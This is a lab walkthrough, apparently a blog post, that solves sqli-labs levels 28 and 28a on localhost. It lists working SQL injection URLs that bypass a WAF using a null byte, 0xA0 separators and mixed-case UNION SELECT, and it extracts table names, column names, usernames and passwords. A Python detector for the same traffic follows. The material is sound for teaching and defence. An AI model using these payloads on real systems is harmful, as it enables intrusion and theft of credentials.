sqli-labs (less-28 and less-28a)

less-28

Enter level 28 and input id=1.

View the source code. It is basically the same as level 27, and mixed case is still used to bypass the filtering.

http://127.0.0.1/sql1/Less-28/?id=1' # an error is echoed
http://127.0.0.1/sql1/Less-28/?id=1');%00 # displays normally


The closing method is judged to be ');%00, and this is a character-type injection.

Determine the echo position

http://127.0.0.1/sql1/Less-28/?id=111') %a0 UniON %a0 sElect %a0 1,2,3;%00


View the current database

http://127.0.0.1/sql1/Less-28/?id=111') %a0 UniON %a0 sElect %a0 1,2,database();%00


View all tables in the security database

http://127.0.0.1/sql1/Less-28/?id=111') %a0 UniON %a0 sElect %a0 1,2,(select (group_concat(table_name)) from (information_schema.tables) where (table_schema='security'));%00


View all fields of the users table

http://127.0.0.1/sql1/Less-28/?id=111') %a0 UniON %a0 sElect %a0 1,2,(select (group_concat(column_name)) from (information_schema.columns) where (table_name='users'));%00


View the values of the username and password fields

http://127.0.0.1/sql1/Less-28/?id=111') %a0 UniON %a0 sElect %a0 1,2,(select (group_concat(username,password)) from (security.users));%00

less-28a

http://127.0.0.1/sql1/Less-28a/?id=1' # an error is echoed
http://127.0.0.1/sql1/Less-28a/?id=1');%00 # displays normally


The closing method is judged to be ');%00, and this is a character-type injection.
The remaining steps are not repeated here; they are exactly the same as less-28. This level also uses mixed case to bypass the WAF.
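
A detection-side view of the requests above, as an added example that is not part of the original post: it percent-decodes the query string of each logged request, folds case and treats 0xA0 as whitespace before matching, which is the step a pattern applied to the raw line misses. The log lines are constructed from the requests shown above, and the separator set and function names are assumptions of this example.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed access-log request lines modelled on the requests shown above.
SAMPLE_LOG = [
    "GET /sql1/Less-28/?id=1 HTTP/1.1",
    "GET /sql1/Less-28/?id=111')%a0UniON%a0sElect%a01,2,3;%00 HTTP/1.1",
    "GET /sql1/Less-28a/?id=1');%00 HTTP/1.1",
]

# Bytes treated as keyword separators (an assumption of this example); 0xA0 is
# the one the page's requests place between keywords.
SEPARATORS = b"\t\n\x0b\x0c\r \xa0"
TO_SPACE = bytes.maketrans(SEPARATORS, b" " * len(SEPARATORS))
UNION_SELECT = re.compile(rb"\bunion\s+(?:all\s+)?select\b")
NAIVE = re.compile(r"union\s+select", re.I)  # raw-line match, for comparison


def inspect(request_line: str) -> list:
    """Return the reasons a logged request line resembles the traffic above."""
    parts = request_line.split()
    if len(parts) < 2:
        return []
    query = parts[1].partition("?")[2]
    # Decode to bytes so %a0 and %00 become the single bytes the backend sees.
    decoded = unquote_to_bytes(query.replace("+", " "))
    normalised = decoded.lower().translate(TO_SPACE)
    reasons = []
    if UNION_SELECT.search(normalised):
        reasons.append("union-select")
    if b"\xa0" in decoded:
        reasons.append("0xa0-separator")
    if b"\x00" in decoded:
        reasons.append("nul-byte")
    return reasons


def scan(lines):
    """Map each flagged line to its reasons; unflagged lines are omitted."""
    return {line: r for line in lines if (r := inspect(line))}


if __name__ == "__main__":
    for line, reasons in scan(SAMPLE_LOG).items():
        print(", ".join(reasons), "<-", line)
```

The case-insensitive `NAIVE` pattern finds nothing in the second sample line because `%a0` is still encoded there and is not whitespace to the regex engine.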

Origin blog.csdn.net/kukudeshuo/article/details/114710136